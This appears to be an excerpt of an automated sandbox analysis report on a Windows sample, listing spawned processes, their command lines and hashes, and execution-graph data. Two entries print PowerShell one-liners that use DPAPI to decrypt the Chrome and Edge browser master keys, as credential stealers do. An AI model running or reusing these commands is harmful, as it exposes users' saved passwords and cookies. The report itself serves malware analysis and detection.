                                                                                Start date:29/10/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff66e660000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:13
                                                                                Start time:09:09:30
                                                                                Start date:29/10/2024
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:powershell -Command "(Get-Item 'C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe').VersionInfo.FileVersion"
                                                                                Imagebase:0x7ff6e3d50000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:14
                                                                                Start time:09:09:30
                                                                                Start date:29/10/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff66e660000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:15
                                                                                Start time:09:09:41
                                                                                Start date:29/10/2024
                                                                                Path:C:\Windows\System32\tasklist.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:tasklist
                                                                                Imagebase:0x7ff7a9600000
                                                                                File size:106'496 bytes
                                                                                MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:16
                                                                                Start time:09:09:41
                                                                                Start date:29/10/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff66e660000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:17
                                                                                Start time:09:09:42
                                                                                Start date:29/10/2024
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:powershell -Command " Add-Type -AssemblyName \"System.Security\"; $decryptedKey = [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,82,140,181,59,205,133,36,68,131,195,71,114,10,9,65,24,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,36,243,112,255,236,176,19,21,161,232,5,156,15,224,214,169,185,79,161,35,240,200,160,226,160,19,168,214,186,239,155,235,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,225,241,231,195,97,47,248,22,206,161,226,92,44,44,51,207,166,8,46,136,147,185,84,185,27,183,252,114,164,252,148,168,48,0,0,0,2,140,235,235,139,99,133,55,160,143,64,53,168,135,193,81,10,81,94,101,239,145,72,8,97,176,119,236,164,201,155,27,236,184,11,80,145,31,10,79,199,92,71,166,116,84,131,150,64,0,0,0,33,136,240,246,163,86,84,202,92,12,170,239,80,17,93,81,235,159,209,41,5,212,210,23,106,50,31,57,94,244,205,86,198,111,237,171,160,240,77,231,4,197,113,175,235,153,59,29,176,183,188,244,160,186,186,93,146,97,116,126,129,24,71,225), $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser); $decryptedKeyString = [System.BitConverter]::ToString($decryptedKey) -replace '-', ''; Write-Output $decryptedKeyString"
                                                                                Imagebase:0x7ff6e3d50000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:18
                                                                                Start time:09:09:42
                                                                                Start date:29/10/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff66e660000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:20
                                                                                Start time:09:09:56
                                                                                Start date:29/10/2024
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:powershell -Command " Add-Type -AssemblyName \"System.Security\"; $decryptedKey = [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,82,140,181,59,205,133,36,68,131,195,71,114,10,9,65,24,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,73,231,212,88,131,180,108,13,7,151,85,6,156,66,67,185,57,141,176,137,39,153,232,122,3,148,29,97,139,226,146,101,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,25,208,58,196,147,38,229,71,17,84,57,121,51,122,21,191,192,210,223,56,196,102,132,177,163,7,170,237,170,96,43,123,48,0,0,0,22,214,107,180,137,106,64,43,246,209,3,97,183,60,179,87,35,178,252,209,63,28,6,231,92,233,101,110,37,191,114,95,102,37,85,25,129,162,60,71,136,36,115,191,138,222,1,225,64,0,0,0,221,128,244,169,226,245,40,30,145,232,4,127,240,108,165,92,23,225,199,246,49,201,112,97,127,7,108,202,49,141,230,234,32,54,72,203,159,33,237,81,195,247,232,115,207,194,239,99,114,230,169,121,178,134,199,77,110,131,115,20,107,231,17,6), $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser); $decryptedKeyString = [System.BitConverter]::ToString($decryptedKey) -replace '-', ''; Write-Output $decryptedKeyString"
                                                                                Imagebase:0x7ff6e3d50000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:21
                                                                                Start time:09:09:56
                                                                                Start date:29/10/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff66e660000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                  Execution Graph

                                                                                  Execution Coverage:3.1%
                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                  Signature Coverage:100%
                                                                                  Total number of Nodes:4
                                                                                  Total number of Limit Nodes:0
                                                                                  execution_graph 1564 7ffd347652ae 1565 7ffd347652ca 1564->1565 1566 7ffd347653c7 CryptUnprotectData 1565->1566 1567 7ffd34765443 1566->1567

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000011.00000002.2568234990.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_17_2_7ffd34760000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID: CryptDataUnprotect
                                                                                  • String ID:
                                                                                  • API String ID: 834300711-0
                                                                                  • Opcode ID: a13397314045feb5e0b310fcb46c1bdb694703c78a46ddce50ccbf772ecfb89d
                                                                                  • Instruction ID: 21e4f5ae22129ed35392ffa30cb2fb32f4c901c0d3776603d688ba61f098e3a2
                                                                                  • Opcode Fuzzy Hash: a13397314045feb5e0b310fcb46c1bdb694703c78a46ddce50ccbf772ecfb89d
                                                                                  • Instruction Fuzzy Hash: 18514B70A1CA489FD758EB5C98166B97BE1FF9A310F00427EE44DC3293CE28AC5587D2

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 94 7ffd34763ef8 95 7ffd34763efd-7ffd34763f19 94->95 98 7ffd34763f1d-7ffd34763f2a 95->98 100 7ffd34763f2d-7ffd34763f40 98->100 103 7ffd34763f42-7ffd34763f61 100->103 104 7ffd34763fb3-7ffd34763fd1 100->104 103->95 115 7ffd34763f63-7ffd34763f6b 103->115 110 7ffd34763fd3-7ffd34763fd9 104->110 111 7ffd34763f6d-7ffd34763f81 104->111 116 7ffd34763fdf-7ffd34763ff1 110->116 117 7ffd34763fdb-7ffd34763fde 110->117 111->98 118 7ffd34763f83-7ffd34763f89 111->118 115->111 122 7ffd34763f8d-7ffd34763f91 116->122 125 7ffd34763ff3-7ffd34763ff9 116->125 117->116 118->122 122->100 124 7ffd34763f93-7ffd34763faf 122->124 124->104
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000011.00000002.2568234990.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_17_2_7ffd34760000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4
                                                                                  • API String ID: 0-4088798008
                                                                                  • Opcode ID: 6b2196b435f0a5fb0aa0599f62aced46a11abbea498301e1d558c00f0af69733
                                                                                  • Instruction ID: 516c919cd7b897a1b7967de071d761daeeb4fafc1b33297ea120327df1efa8f1
                                                                                  • Opcode Fuzzy Hash: 6b2196b435f0a5fb0aa0599f62aced46a11abbea498301e1d558c00f0af69733
                                                                                  • Instruction Fuzzy Hash: 87415396B0D6C29AE652422C58FA1E93FB5DF53334F0904BBC6D4CA193AD1D280BE395
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000011.00000002.2568234990.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_17_2_7ffd34760000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 3e1a249fc81be6c8ab82fc12d6e1fd305472db9ae1f11631fd57eb215fc7ffca
                                                                                  • Instruction ID: ba5b58f151e1dbf2cc7944f68eb76eb854985747e880c79e33f3911a32d91fa3
                                                                                  • Opcode Fuzzy Hash: 3e1a249fc81be6c8ab82fc12d6e1fd305472db9ae1f11631fd57eb215fc7ffca
                                                                                  • Instruction Fuzzy Hash: B661B597A0D7D35FE7A2666C5CB64EA3B999F5323470900B7D688CE0D3DD0C680B6292
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000011.00000002.2568234990.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_17_2_7ffd34760000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 215b5fe4c86b3938b4a547d82193172ba6bc88d588a1c477a7a204f65a4b8357
                                                                                  • Instruction ID: 8ee7ef5dae6af53f94d72ef89ea3a915985fab35a09ac1f7f2ee1e9cb1fda043
                                                                                  • Opcode Fuzzy Hash: 215b5fe4c86b3938b4a547d82193172ba6bc88d588a1c477a7a204f65a4b8357
                                                                                  • Instruction Fuzzy Hash: DD5150A6B0E2D29EE713966D58B60E93FA59F5323470D00F7D6C4CB0D3D90D281BE2A1

                                                                                  Execution Graph

                                                                                  Execution Coverage:2.3%
                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                  Signature Coverage:0%
                                                                                  Total number of Nodes:3
                                                                                  Total number of Limit Nodes:0
                                                                                  execution_graph 1322 7ffd3476517d 1323 7ffd347651bf CryptUnprotectData 1322->1323 1325 7ffd34765273 1323->1325

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 0 7ffd3476517d-7ffd34765271 CryptUnprotectData 3 7ffd34765273 0->3 4 7ffd34765279-7ffd347652a8 0->4 3->4
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000014.00000002.2734647411.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_20_2_7ffd34760000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID: CryptDataUnprotect
                                                                                  • String ID:
                                                                                  • API String ID: 834300711-0
                                                                                  • Opcode ID: 0b3426d785680fddf2b76e74b0e7fb72b1c0620f1a1c7cc42435d1d11a60aabf
                                                                                  • Instruction ID: d5389d8d535106ad4deac35f6ca11784a5104847ae0f01635d40e971af4ba175
                                                                                  • Opcode Fuzzy Hash: 0b3426d785680fddf2b76e74b0e7fb72b1c0620f1a1c7cc42435d1d11a60aabf
                                                                                  • Instruction Fuzzy Hash: A7412A3090CB884FDB59DB68D8456A97FF1EF5A320F0442AFE489C3153C668A856CBC2